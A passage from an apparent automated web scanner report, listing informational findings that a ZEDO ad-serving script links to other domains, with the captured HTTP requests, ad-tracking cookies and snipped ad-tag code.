The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.6845351607632746 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=11:13:11:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=12:13:11:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=145
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:47:57 GMT
Connection: close
Content-Length: 2099

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.33;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929078%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=12%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=12%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.137. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9441914791138761 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=2:1:1:None; FFCap=1574B809,210132,210841|1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210133|1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=201
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:00 GMT
Connection: close
Content-Length: 2668

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931215%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=2%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=2%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.138. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.8862097934350706 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=18:19:17:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1;expires=Tue, 24 May 2011 16:48:19 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=20:18:17:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:19 GMT
Connection: close
Content-Length: 2124

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3271.dogtimemedia.com/B5314413.11;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=921884%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=20%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=20%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.139. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.0850993012915276 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=52:48:46:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=47:52:48:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=107
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:07 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=47%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=47%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.140. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8632092914995171 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=20:18:17:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=18:20:18:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=119
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:22 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=18%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=18%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.141. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.8162023249169547 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=20:21:19:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:25 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=22:20:19:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=116
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:25 GMT
Connection: close
Content-Length: 2107

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.32;sz=160x600;click=http://yads.zedo.com/ads2/c?a=929080%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=22%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=22%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.142. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.7809348179682917 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=15:16:14:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:12 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=16:16:14:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=129
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:48:13 GMT
Connection: close
Content-Length: 2093

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.30;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929081%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=16%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=16%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.143. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=homepageroadblock&$=&s=376&z=0.24159747382238178 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,21; FFad=0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210133|0,1,1;expires=Tue, 24 May 2011 16:45:58 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=263
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:45:58 GMT
Connection: close
Content-Length: 2702

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='homepager
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931215%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=0%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.144. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.13716645412201545 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=3:2:2:None; FFCap=1574B809,210132,210841|2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128|2,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:02 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:2:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=199
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:02 GMT
Connection: close
Content-Length: 2690

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587463/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931206%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=4%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=4%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.145. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.4695879082935963 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=40:44:41:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=42:40:44:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=32
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:49 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=42%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=42%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.146. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
